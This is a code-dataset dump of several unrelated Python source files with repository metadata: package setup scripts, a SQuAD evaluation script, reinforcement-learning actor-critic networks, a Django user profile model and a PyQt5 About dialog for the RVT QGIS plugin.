      url='https://bitbucket.org/aganitha/image-transformer',
      author='Daksh Varshneya',
      author_email='daksh@aganitha.ai',
      license='MIT',
      packages=['imgTransformer'],
      zip_safe=False) | 0 | 0 | 0 |
ef1187309a7dc7bcf2f9a30a6980bbaa6a9e607e | 1,010 | py | Python | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | null | null | null | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | 1 | 2016-02-03T03:02:44.000Z | 2016-02-03T03:02:44.000Z | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from genomon_post_analysis import __version__
setup(name='genomon_post_analysis',
version=__version__,
description="parser result files created by genomon",
long_description="""\n
parser result files created by genomon (SV, mutaion-call and so on)""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='genomon post analysis',
author='ai okada',
author_email='genomon_team@gamil.com',
url='https://github.com/Genomon-Project/Genomon.git',
license='License of GenomonPipeline',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
scripts=['genomon_pa'],
data_files=[('config', ['genomon_post_analysis.cfg'])],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| 34.827586 | 95 | 0.658416 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from genomon_post_analysis import __version__
setup(name='genomon_post_analysis',
version=__version__,
description="parser result files created by genomon",
long_description="""\n
parser result files created by genomon (SV, mutaion-call and so on)""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='genomon post analysis',
author='ai okada',
author_email='genomon_team@gamil.com',
url='https://github.com/Genomon-Project/Genomon.git',
license='License of GenomonPipeline',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
scripts=['genomon_pa'],
data_files=[('config', ['genomon_post_analysis.cfg'])],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| 0 | 0 | 0 |
25e0e667349b8d5df9059920c0177bad8a1c5d96 | 158 | py | Python | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | import random
# Write 1000 random integers, one per line, into a file named 'in'.
# Each value is drawn from [1, 10**x] with x random in [1, 100], so the
# magnitudes vary wildly (up to ~100 digits) — useful as stress-test input.
with open('in', 'w') as f:
    # NOTE(review): xrange exists only in Python 2; this script targets Python 2.
    for _ in xrange(1000):
        x = random.randint(1, 100)
        f.write(str(random.randint(1, 10**x)) + '\n')
| 22.571429 | 53 | 0.550633 | import random
# Write 1000 random integers, one per line, into a file named 'in'.
# Each value is drawn from [1, 10**x] with x random in [1, 100], so the
# magnitudes vary wildly (up to ~100 digits) — useful as stress-test input.
with open('in', 'w') as f:
    # NOTE(review): xrange exists only in Python 2; this script targets Python 2.
    for _ in xrange(1000):
        x = random.randint(1, 100)
        f.write(str(random.randint(1, 10**x)) + '\n')
| 0 | 0 | 0 |
900a78f05daf46f9c43e675546679632759dd7ff | 419 | py | Python | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | null | null | null | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | 1 | 2020-08-18T21:22:15.000Z | 2021-02-01T22:39:16.000Z | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | null | null | null | """
drain.types.py
~~~~~~~~~~~~~~
Contains custom types definitions and utilities
"""
from .record import Record
from typing import (
Awaitable,
AsyncIterable,
Callable,
Union,
TypeVar,
)
# Generic record type flowing through a pipeline; constrained to Record subclasses.
RecordT = TypeVar("RecordT", bound=Record)
# A source of records: anything asynchronously iterable.
Source = AsyncIterable[RecordT]
# A processing step: maps a record to a record, either as a plain function
# or as a coroutine function (awaitable result).
Processor = Union[
    Callable[[RecordT], RecordT], Callable[[RecordT], Awaitable[RecordT]]
]
# A filter criterion: decides whether a record should pass.
Predicate = Callable[[RecordT], bool]
| 18.217391 | 73 | 0.684964 | """
drain.types.py
~~~~~~~~~~~~~~
Contains custom types definitions and utilities
"""
from .record import Record
from typing import (
Awaitable,
AsyncIterable,
Callable,
Union,
TypeVar,
)
# Generic record type flowing through a pipeline; constrained to Record subclasses.
RecordT = TypeVar("RecordT", bound=Record)
# A source of records: anything asynchronously iterable.
Source = AsyncIterable[RecordT]
# A processing step: maps a record to a record, either as a plain function
# or as a coroutine function (awaitable result).
Processor = Union[
    Callable[[RecordT], RecordT], Callable[[RecordT], Awaitable[RecordT]]
]
# A filter criterion: decides whether a record should pass.
Predicate = Callable[[RecordT], bool]
| 0 | 0 | 0 |
c32d236082ab80c17404c0ea8d433bae280a34a9 | 2,403 | py | Python | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | """
Functions for evaluating the performance of the model on the
squad dataset
Modified the official squad dataset evaluation script
"""
import string
import re
from collections import Counter
def normalize_answer(s):
    """Lower text and remove punctuation, articles, and extra whitespace.

    Mirrors the official SQuAD evaluation normalization so token
    comparisons ignore case, punctuation, the articles a/an/the, and
    redundant whitespace.
    """
    # NOTE(review): the four helpers referenced below were missing from this
    # copy, which made the function raise NameError at runtime; they are
    # restored here to match the SQuAD reference script.
    def remove_articles(text):
        # Strip English articles only when they stand alone as words.
        return re.sub(r'\b(a|an|the)\b', ' ', text)

    def white_space_fix(text):
        # Collapse any run of whitespace into a single space.
        return ' '.join(text.split())

    def remove_punc(text):
        exclude = set(string.punctuation)
        return ''.join(ch for ch in text if ch not in exclude)

    def lower(text):
        return text.lower()

    return white_space_fix(remove_articles(remove_punc(lower(s))))
def evaluate(predictions, answerss):
    """Score a batch of predictions against per-question answer lists.

    For every (prediction, answers) pair the best F1 and the best
    sentence-containment score over the available ground truths are
    accumulated, then averaged and scaled to percentages.

    Returns a dict with keys 'f1' and 'sscore'.  The sentence score is a
    much softer metric than F1: it only checks whether a ground-truth
    string occurs inside the prediction, ignoring the difficulty of
    locating the exact answer span.
    """
    f1_sum = 0
    sentence_sum = 0
    count = 0
    for prediction, answers in zip(predictions, answerss):
        count += 1
        f1_sum += metric_max_over_ground_truths(f1_score, prediction, answers)
        sentence_sum += metric_max_over_ground_truths(sentence_score, prediction, answers)
    # Convert the running sums into percentage averages.
    return {'sscore': 100.0 * sentence_sum / count,
            'f1': 100.0 * f1_sum / count}
| 32.472973 | 80 | 0.738244 | """
Functions for evaluating the performance of the model on the
squad dataset
Modified the official squad dataset evaluation script
"""
import string
import re
from collections import Counter
def normalize_answer(s):
    """Lower text and remove punctuation, articles, and extra whitespace."""
    punctuation = set(string.punctuation)
    # Lowercase first, then drop punctuation characters one by one.
    text = ''.join(ch for ch in s.lower() if ch not in punctuation)
    # Remove the English articles a/an/the as standalone words.
    text = re.sub(r'\b(a|an|the)\b', ' ', text)
    # Collapse whitespace runs into single spaces and trim the ends.
    return ' '.join(text.split())
def f1_score(prediction, answer):
    """Token-overlap F1 between a predicted answer and one reference answer."""
    pred_tokens = normalize_answer(prediction).split()
    ref_tokens = normalize_answer(answer).split()
    # Multiset intersection: each shared token counts at most min(count) times.
    shared = sum((Counter(pred_tokens) & Counter(ref_tokens)).values())
    if shared == 0:
        return 0
    precision = 1.0 * shared / len(pred_tokens)
    recall = 1.0 * shared / len(ref_tokens)
    # Harmonic mean of precision and recall.
    return (2 * precision * recall) / (precision + recall)
def sentence_score(prediction, ground_truths):
    """Return 1 if any ground-truth string occurs verbatim in the prediction, else 0."""
    # Plain substring containment — no normalization is applied here.
    return 1 if any(truth in prediction for truth in ground_truths) else 0
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
    """Evaluate metric_fn against every ground truth and keep the best score.

    Raises ValueError when ground_truths is empty (max of an empty sequence),
    matching the SQuAD reference behaviour.
    """
    return max(metric_fn(prediction, truth) for truth in ground_truths)
def evaluate(predictions, answerss):
    """Score a batch of predictions against per-question answer lists.

    For every (prediction, answers) pair the best F1 and the best
    sentence-containment score over the available ground truths are
    accumulated, then averaged and scaled to percentages.

    Returns a dict with keys 'f1' and 'sscore'.  The sentence score is a
    much softer metric than F1: it only checks whether a ground-truth
    string occurs inside the prediction, ignoring the difficulty of
    locating the exact answer span.
    """
    f1_sum = 0
    sentence_sum = 0
    count = 0
    for prediction, answers in zip(predictions, answerss):
        count += 1
        f1_sum += metric_max_over_ground_truths(f1_score, prediction, answers)
        sentence_sum += metric_max_over_ground_truths(sentence_score, prediction, answers)
    # Convert the running sums into percentage averages.
    return {'sscore': 100.0 * sentence_sum / count,
            'f1': 100.0 * f1_sum / count}
| 1,003 | 0 | 168 |
4515da330765b45770ff44c4563990c1d5ae63f6 | 3,834 | py | Python | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | 1 | 2020-12-14T16:14:06.000Z | 2020-12-14T16:14:06.000Z | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | null | null | null | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | null | null | null | """Policies
This script provides policies for RL algorithms.
Class:
* Model - (arbitrary) neural network architecture
* BetaActor - actor with beta policy
* GaussianActor - actor with gaussian policy
* Critic - state value function
* ActorCritic - actor and critic combined
"""
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Beta
| 25.731544 | 71 | 0.586594 | """Policies
This script provides policies for RL algorithms.
Class:
* Model - (arbitrary) neural network architecture
* BetaActor - actor with beta policy
* GaussianActor - actor with gaussian policy
* Critic - state value function
* ActorCritic - actor and critic combined
"""
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Beta
class Model(nn.Module):
    """Two-stream network: a conv stack for a 3-channel image plus a small
    MLP for an 18-dimensional numeric vector, fused into one linear head of
    size ``out_size`` (actions, distribution parameters, or a value)."""

    def __init__(self, out_size):
        super(Model, self).__init__()
        # Image stream.  Layer creation order is kept stable so that
        # seeded parameter initialization stays reproducible.
        self.conv1 = nn.Conv2d(3, 32, 8, 4)
        self.conv2 = nn.Conv2d(32, 64, 4, 2)
        self.conv3 = nn.Conv2d(64, 64, 3, 1)
        self.fcV1 = nn.Linear(12288, 512)
        # Numeric-state stream.
        self.fcN1 = nn.Linear(18, 128)
        self.fcN2 = nn.Linear(128, 128)
        # Fusion of both streams (512 visual + 128 numeric features).
        self.fcC1 = nn.Linear(512 + 128, 256)
        # Output head.
        self.fcOut = nn.Linear(256, out_size)

    def forward(self, obs):
        """Map obs = (image, numeric, extra) to a (batch, out_size) tensor.

        The third element of obs is accepted but not used by this network.
        """
        image, numeric, _ = obs[0], obs[1], obs[2]
        # Convolutional image encoder followed by a linear projection.
        feat = F.relu(self.conv1(image))
        feat = F.relu(self.conv2(feat))
        feat = F.relu(self.conv3(feat))
        feat = F.relu(self.fcV1(torch.flatten(feat, 1)))
        # Two-layer MLP over the numeric state.
        state = F.relu(self.fcN2(F.relu(self.fcN1(numeric))))
        # Concatenate (numeric first, as before), fuse, and project.
        fused = F.relu(self.fcC1(torch.cat([state, feat], 1)))
        return self.fcOut(fused)
class Actor(nn.Module):
    """Abstract policy head: subclasses define the action distribution and
    how to score actions under it."""

    def get_dist(self, obs):
        """Return the action distribution for obs (subclass responsibility)."""
        raise NotImplementedError

    def get_logp(self, pi, action):
        """Return the log-probability of action under distribution pi."""
        raise NotImplementedError

    def forward(self, obs, action=None):
        """Return (distribution, logp); logp is None when no action is given."""
        dist = self.get_dist(obs)
        if action is None:
            return dist, None
        return dist, self.get_logp(dist, action)
class BetaActor(Actor):
    """Actor producing a factored Beta policy over two action dimensions,
    which keeps samples naturally bounded to [0, 1]."""

    def __init__(self, model):
        super(BetaActor, self).__init__()
        # Four network outputs: alpha and beta concentrations for 2 actions.
        self.model = globals()[model](out_size=4)

    def get_dist(self, obs):
        params = self.model(obs)
        # Columns [0:2] are the alpha concentrations, [2:4] the betas.
        return Beta(params[:, :2], params[:, 2:])

    def get_logp(self, pi, action):
        # Dimensions are independent: joint log-prob is the sum over dim 1.
        return pi.log_prob(action).sum(1)
class GaussianActor(Actor):
    """Actor with a diagonal Gaussian policy; the log standard deviation is a
    learned, state-independent parameter."""

    def __init__(self, model):
        super(GaussianActor, self).__init__()
        # The network predicts the 2-dimensional action mean.
        self.model = globals()[model](out_size=2)
        # Initial per-dimension log-std values.
        log_std = np.array([0.55, -0.35], dtype=np.float32)
        self.log_std = torch.nn.Parameter(torch.as_tensor(log_std))

    def get_dist(self, obs):
        mean = self.model(obs)
        stddev = torch.exp(self.log_std)
        # Diagonal covariance expressed through its Cholesky factor.
        return MultivariateNormal(mean, scale_tril=torch.diag_embed(stddev))

    def get_logp(self, pi, action):
        return pi.log_prob(action)
class Critic(nn.Module):
    """State-value head built on the shared network architecture."""

    def __init__(self, model):
        super(Critic, self).__init__()
        # A single scalar output per observation.
        self.model = globals()[model](out_size=1)

    def forward(self, obs):
        """Return the value estimate produced by the underlying network."""
        value = self.model(obs)
        return value
class ActorCritic(object):
    """Convenience wrapper pairing a stochastic policy (actor) with a
    state-value estimator (critic), both built from the same model name."""

    def __init__(self, model, policy="gaussian", device="cpu"):
        # Resolve e.g. "gaussian" -> GaussianActor, "beta" -> BetaActor.
        actor_name = policy.capitalize() + "Actor"
        self.pi = globals()[actor_name](model).to(device)
        self.value_fn = Critic(model).to(device)

    def act(self, obs):
        """Returns (deterministic) action and state value"""
        with torch.no_grad():
            dist = self.pi.get_dist(obs)
            value = self.value_fn(obs)
        # The distribution mean is the deterministic action choice.
        return dist.mean.numpy(), value.item()

    def sample(self, obs):
        """Returns sampled action, log probability and state-value"""
        with torch.no_grad():
            dist = self.pi.get_dist(obs)
            action = dist.sample()
            logp = self.pi.get_logp(dist, action)
            value = self.value_fn(obs)
        return action.numpy(), logp.item(), value.item()
| 1,716 | 1,289 | 381 |
4936791bab78f4771ebc17ca5ede24c3e7259a3a | 2,416 | py | Python | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | 1 | 2021-01-05T15:52:19.000Z | 2021-01-05T15:52:19.000Z | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | null | null | null | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | 1 | 2021-01-05T18:44:47.000Z | 2021-01-05T18:44:47.000Z | from django.db import models
from django.contrib.auth.models import User
from django_countries.fields import CountryField
# Imports so it can receive data from signals.py
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create or update user profile
@receiver(post_save, sender=User)
| 36.606061 | 71 | 0.440397 | from django.db import models
from django.contrib.auth.models import User
from django_countries.fields import CountryField
# Imports so it can receive data from signals.py
from django.db.models.signals import post_save
from django.dispatch import receiver
class UserProfile(models.Model):
    """Per-user default contact and delivery details.

    Every field is optional (null/blank) so a profile can start empty and
    be filled in over time.  A matching profile row is created/saved by the
    post_save signal handler below.
    """
    # Specifies that each user can have only one profile
    # Deleting the User cascades to the profile.
    user = models.OneToOneField(
        User,
        on_delete=models.CASCADE)
    # Adds values for storing
    default_phone_number = models.CharField(
        max_length=20,
        null=True,
        blank=True,
    )
    default_street_address1 = models.CharField(
        max_length=80,
        null=True,
        blank=True
    )
    default_street_address2 = models.CharField(
        max_length=80,
        null=True,
        blank=True
    )
    default_county = models.CharField(
        max_length=80,
        null=True,
        blank=True
    )
    default_town_or_city = models.CharField(
        max_length=40,
        null=True,
        blank=True
    )
    # Postcode defaults to the empty string rather than NULL.
    default_postcode = models.CharField(
        max_length=20,
        null=True,
        blank=True,
        default=''
    )
    # Country picker from django-countries; blank_label is the placeholder text.
    default_country = CountryField(
        blank_label='Country',
        max_length=20,
        null=True,
        blank=True
    )

    def __str__(self):
        # Display profiles by the owning user's username.
        return self.user.username
# Create or update user profile
@receiver(post_save, sender=User)
def create_or_update_user_profile(sender, instance, created, **kwargs):
    """post_save hook on User: create the profile on first save, then persist it."""
    if created:
        UserProfile.objects.create(user=instance)
    # For existing users, just saves the profile
    instance.userprofile.save()
| 229 | 1,817 | 45 |
446332503930a9c0debdf3c989c347e8eee3151c | 11,368 | py | Python | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 6 | 2021-02-02T12:47:45.000Z | 2022-02-14T10:31:36.000Z | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 12 | 2020-12-14T06:45:14.000Z | 2021-08-10T05:25:10.000Z | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 2 | 2021-01-23T00:11:12.000Z | 2021-12-14T22:53:13.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'qrvt_dialog_about.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
| 55.453659 | 225 | 0.674085 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'qrvt_dialog_about.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_RvtAbout(object):
def setupUi(self, RvtAbout):
    """Build the About-dialog widget tree.

    Generated by pyuic5 from qrvt_dialog_about.ui — regenerating the .ui
    file will overwrite manual edits, so keep changes to the .ui source.
    """
    # Dialog shell and the two nested vertical layouts that hold everything.
    RvtAbout.setObjectName("RvtAbout")
    RvtAbout.resize(600, 700)
    self.verticalLayout_3 = QtWidgets.QVBoxLayout(RvtAbout)
    self.verticalLayout_3.setObjectName("verticalLayout_3")
    self.verticalLayout = QtWidgets.QVBoxLayout()
    self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
    self.verticalLayout.setObjectName("verticalLayout")
    # Bold 10pt title label.
    self.label = QtWidgets.QLabel(RvtAbout)
    self.label.setMinimumSize(QtCore.QSize(0, 0))
    self.label.setMaximumSize(QtCore.QSize(16777215, 16777215))
    font = QtGui.QFont()
    font.setPointSize(10)
    font.setBold(True)
    font.setWeight(75)
    self.label.setFont(font)
    self.label.setObjectName("label")
    self.verticalLayout.addWidget(self.label)
    # Row with the credits text on the left.
    self.horizontalLayout = QtWidgets.QHBoxLayout()
    self.horizontalLayout.setObjectName("horizontalLayout")
    self.label_2 = QtWidgets.QLabel(RvtAbout)
    self.label_2.setMinimumSize(QtCore.QSize(0, 0))
    self.label_2.setMaximumSize(QtCore.QSize(16777215, 16777215))
    self.label_2.setObjectName("label_2")
    self.horizontalLayout.addWidget(self.label_2)
    # Logo column centered by spacers on both sides.
    self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
    self.horizontalLayout_2.setObjectName("horizontalLayout_2")
    spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontalLayout_2.addItem(spacerItem)
    self.verticalLayout_2 = QtWidgets.QVBoxLayout()
    self.verticalLayout_2.setObjectName("verticalLayout_2")
    # Fixed 240x147 logo, scaled pixmap loaded from icon.png.
    self.label_9 = QtWidgets.QLabel(RvtAbout)
    sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
    sizePolicy.setHorizontalStretch(0)
    sizePolicy.setVerticalStretch(0)
    sizePolicy.setHeightForWidth(self.label_9.sizePolicy().hasHeightForWidth())
    self.label_9.setSizePolicy(sizePolicy)
    self.label_9.setMinimumSize(QtCore.QSize(240, 147))
    self.label_9.setMaximumSize(QtCore.QSize(240, 147))
    self.label_9.setText("")
    self.label_9.setPixmap(QtGui.QPixmap("icon.png"))
    self.label_9.setScaledContents(True)
    self.label_9.setObjectName("label_9")
    self.verticalLayout_2.addWidget(self.label_9)
    self.horizontalLayout_2.addLayout(self.verticalLayout_2)
    spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontalLayout_2.addItem(spacerItem1)
    self.horizontalLayout.addLayout(self.horizontalLayout_2)
    self.verticalLayout.addLayout(self.horizontalLayout)
    # Rich-text information labels; label_3 and label_8 open links externally.
    self.label_3 = QtWidgets.QLabel(RvtAbout)
    self.label_3.setMinimumSize(QtCore.QSize(0, 0))
    self.label_3.setMaximumSize(QtCore.QSize(16777215, 16777215))
    self.label_3.setOpenExternalLinks(True)
    self.label_3.setObjectName("label_3")
    self.verticalLayout.addWidget(self.label_3)
    self.label_4 = QtWidgets.QLabel(RvtAbout)
    self.label_4.setMinimumSize(QtCore.QSize(0, 0))
    self.label_4.setMaximumSize(QtCore.QSize(16777215, 16777215))
    self.label_4.setObjectName("label_4")
    self.verticalLayout.addWidget(self.label_4)
    self.label_5 = QtWidgets.QLabel(RvtAbout)
    self.label_5.setMinimumSize(QtCore.QSize(0, 0))
    self.label_5.setMaximumSize(QtCore.QSize(16777215, 16777215))
    self.label_5.setObjectName("label_5")
    self.verticalLayout.addWidget(self.label_5)
    self.label_7 = QtWidgets.QLabel(RvtAbout)
    self.label_7.setObjectName("label_7")
    self.verticalLayout.addWidget(self.label_7)
    self.label_8 = QtWidgets.QLabel(RvtAbout)
    self.label_8.setOpenExternalLinks(True)
    self.label_8.setObjectName("label_8")
    self.verticalLayout.addWidget(self.label_8)
    self.label_6 = QtWidgets.QLabel(RvtAbout)
    self.label_6.setObjectName("label_6")
    self.verticalLayout.addWidget(self.label_6)
    # Button row: "report bug" and "close", spread out with spacers;
    # the stretch factors below keep the buttons apart (middle stretch = 5).
    self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
    self.horizontalLayout_3.setObjectName("horizontalLayout_3")
    spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontalLayout_3.addItem(spacerItem2)
    self.button_report_bug = QtWidgets.QPushButton(RvtAbout)
    self.button_report_bug.setObjectName("button_report_bug")
    self.horizontalLayout_3.addWidget(self.button_report_bug)
    spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontalLayout_3.addItem(spacerItem3)
    self.button_close = QtWidgets.QPushButton(RvtAbout)
    self.button_close.setObjectName("button_close")
    self.horizontalLayout_3.addWidget(self.button_close)
    spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontalLayout_3.addItem(spacerItem4)
    self.horizontalLayout_3.setStretch(0, 1)
    self.horizontalLayout_3.setStretch(1, 1)
    self.horizontalLayout_3.setStretch(2, 5)
    self.horizontalLayout_3.setStretch(3, 1)
    self.horizontalLayout_3.setStretch(4, 1)
    self.verticalLayout.addLayout(self.horizontalLayout_3)
    self.verticalLayout_3.addLayout(self.verticalLayout)
    # Apply translated texts, then auto-connect slots by object name.
    self.retranslateUi(RvtAbout)
    QtCore.QMetaObject.connectSlotsByName(RvtAbout)
def retranslateUi(self, RvtAbout):
    """Set all user-visible strings on the RvtAbout dialog.

    Auto-generated by Qt Designer / pyuic; prefer fixing the .ui source and
    regenerating. Fixed here: malformed closing tags in the rich-text
    (literal "<\\body>"/"<\\html>" rendered as broken markup instead of
    "</body>"/"</html>") and spelling errors in the license, references and
    suggestions sections.
    """
    _translate = QtCore.QCoreApplication.translate
    RvtAbout.setWindowTitle(_translate("RvtAbout", "RvtAbout"))
    self.label.setText(_translate("RvtAbout", "Relief Visualization Toolbox (RVT) QGIS plugin, ver. 0.3"))
    self.label_2.setText(_translate("RvtAbout", "<html><head/><body>\n"
        "<span style=\" font-weight:600;\">○ By:</span>\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Žiga Kokalj\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Krištof Oštir\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Klemen Zakšek\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Peter Pehani\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Klemen Čotar\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Maja Somrak\n"
        "\n"
        "<br>​ ​ ​ ​ \n"
        "• Žiga Maroh (plugin author and maintainer)\n"
        "<br>\n"
        "</body>\n"
        "</html>"))
    self.label_3.setText(_translate("RvtAbout", "<html><head/><body>\n"
        "<span style=\" font-weight:600;\">○ Online resources:</span><br>\n"
        "\n"
        "​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/rvt-qgis\"><span style=\" text-decoration: none; color:#0000ff;\">RVT QGIS plugin GitHub</span></a><br>\n"
        "\n"
        "​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/RVT_py\"><span style=\" text-decoration: none; color:#0000ff;\">RVT core python library GitHub</span></a><br>\n"
        "\n"
        "​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/rvt-arcgis-pro\"><span style=\" text-decoration: none; color:#0000ff;\">RVT ArcGIS Pro raster functions GitHub</span></a><br>\n"
        "\n"
        "​ ​ ​ ​ • <a href=\"https://iaps.zrc-sazu.si/en/rvt#v\"><span style=\" text-decoration: none; color:#0000ff;\">Old RVT</span></a><br>\n"
        "\n"
        "</body>\n"
        "</html>"))
    self.label_4.setText(_translate("RvtAbout", "<html><head/><body>\n"
        "<span style=\" font-weight:600;\">○ License agreement:</span> <br>\n"
        "​ ​ ​ ​ This software is distributed without any warranty and without even the implied warranty of merchantability or fitness \n"
        "<br>​ ​ ​ ​ \n"
        " for a particular purpose.\n"
        "<br>\n"
        "</body>\n"
        "</html>"))
    self.label_5.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ Acknowledgment:</span><br/>\n"
        "​ ​ ​ ​ \n"
        "Development of RVT was partly financed by the European Commission\'s Culture Programme through \n"
        "<br/>​ ​ ​ ​ \n"
        "the ArchaeoLandscapes Europe project and by the Slovenian Research Agency core funding No. P2-0406,\n"
        "<br/>​ ​ ​ ​ \n"
        " and by research projects No. J6-7085 and No. J6-9395. <br/></p></body></html>"))
    self.label_7.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ References:</span><br/>\n"
        "​ ​ ​ ​ \n"
        "When using tools, please cite: <br>​ ​ ​ ​ \n"
        "• Kokalj, Ž., Somrak, M. 2019. Why Not a Single Image? Combining Visualizations to Facilitate Fieldwork and\n"
        "<br>​ ​ ​ ​ ​ ​ ​ \n"
        " On-Screen Mapping. Remote Sensing 11(7): 747.\n"
        "<br>​ ​ ​ ​ \n"
        "• Zakšek, K., Oštir, K., Kokalj, Ž. 2011. Sky-View Factor as a Relief Visualization Technique.\n"
        "<br>​ ​ ​ ​ ​ ​ ​ \n"
        " Remote Sensing 3: 398-415.\n"
        "<br>​ ​ ​ ​ \n"
        "• Kokalj, Ž., Zakšek, K., Oštir, K. 2011. Application of Sky-View Factor for the Visualization of Historic Landscape \n"
        "<br>​ ​ ​ ​ ​ ​ ​ \n"
        "Features in Lidar-Derived Relief Models. Antiquity 85, 327: 263-273.\n"
        "<br>\n"
        "</body></html>"))
    self.label_8.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ Bugs and Suggestions:</span><br/>\n"
        "​ ​ ​ ​ \n"
        "Please report any bugs to <a href=\"https://github.com/EarthObservation/rvt-qgis/issues\"><span style=\" text-decoration: none; color:#0000ff;\">Issues</span></a> or to email: ziga.maroh@icloud.com\n"
        "<br>\n"
        "​ ​ ​ ​ \n"
        "Suggestions for improvements can be sent to email: ziga.kokalj@zrc-sazu.si\n"
        "<br>\n"
        "</body></html>"))
    self.label_6.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ © Copyright:</span><br/>\n"
        "​ ​ ​ ​ \n"
        "Research Center of the Slovenian Academy of Sciences and Arts (ZRC SAZU) and <br>​ ​ ​ ​ \n"
